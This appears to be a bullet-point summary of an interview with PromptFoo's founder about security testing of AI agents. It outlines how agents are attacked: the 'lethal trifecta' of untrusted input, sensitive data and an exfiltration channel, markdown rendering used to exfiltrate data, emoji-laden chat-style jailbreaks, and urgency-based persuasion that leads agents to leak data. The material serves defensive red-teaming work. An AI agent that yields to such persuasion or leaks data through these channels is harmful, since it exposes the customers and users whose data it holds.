Why Social Engineering Now Works on Machines

Key Takeaways

AI agent adoption is accelerating, with 2026 anticipated as a pivotal year for deployment.
Traditional security methods are inadequate for AI agents, whose attack surface is conversational.
PromptFoo enables proactive AI agent security testing, simulating adversarial conversations before deployment.
Vulnerabilities like the "lethal trifecta" and creative jailbreaks highlight novel AI security challenges.
Automated red-teaming simulates human social engineering tactics to identify AI agent weaknesses.

The year 2026 is projected to see a significant increase in AI agent deployment and associated security testing.
Traditional security methods, focused on code, are inadequate for AI agents, whose attack surface is conversational and susceptible to social engineering.
Ian Webster founded PromptFoo after encountering security challenges with an AI agent used by 200 million Discord users.
Fortune 10 companies now utilize PromptFoo to simulate adversarial conversations and prevent issues like data leaks before AI agent deployment.

PromptFoo, initially an open-source tool for Gen AI testing, is increasingly integrated into the development cycle as a security measure.
Efforts are underway to embed AI security checks into CI/CD pipelines and developer IDEs.
The guest predicts AI adoption cycles will be significantly faster than the cloud's 10-year adoption.
Common AI agent vulnerabilities include prompt injections, jailbreaks, and data leakage, a confluence of identity and API security.

The 'lethal trifecta' security model combines untrusted user input, sensitive data, and an exfiltration channel to create security incidents.
Untrusted data can be introduced indirectly via web browsing or document uploads.
Exfiltration channels can be subtle, such as markdown rendering within an AI's output.
AI interactions differ from traditional systems as coercion and indirect methods bypass controls, unlike classic SQL injection.

PromptFoo addresses scenarios like a SaaS provider's incident where an AI interface inadvertently exposed customer information due to unconstrained data access.
Prompt injections and jailbreaks are techniques used to exploit access control issues or cause data leaks, not end goals themselves.
PromptFoo simulates human red-teamers by conducting up to 30,000 simulated conversations to identify vulnerabilities.
The tool generates natural language attacks tailored to specific business contexts and target applications, escalating over 30-50 messages.

Unexpected jailbreaks, like those using millennial chat-style language and emojis, can bypass an AI's guardrails and reinforcement learning defenses.
The combination of persuasive, creative language with deterministic and non-deterministic systems multiplies the potential for novel attacks.
AI agents are exploited through social engineering tactics, such as an AI being persuaded to leak data by a user claiming an urgent request.
Human red-teaming is time-consuming, requiring repetitive conversations and restarts, which automation addresses by covering a wider attack surface.

The guest's experience at Discord involved an AI agent, rolled out to 200 million users in 2023, encountering significant security, trust, and safety issues.
These challenges, including 'jailbreaking' and the 'lethal trifecta,' directly informed the development of PromptFoo.
The current AI security landscape parallels historical platform shifts, where solutions often emerge from engineers solving their own problems.
The guest recommends PromptFoo as an open-source tool for AI safety and security evaluations, predicting a significant year ahead for AI development.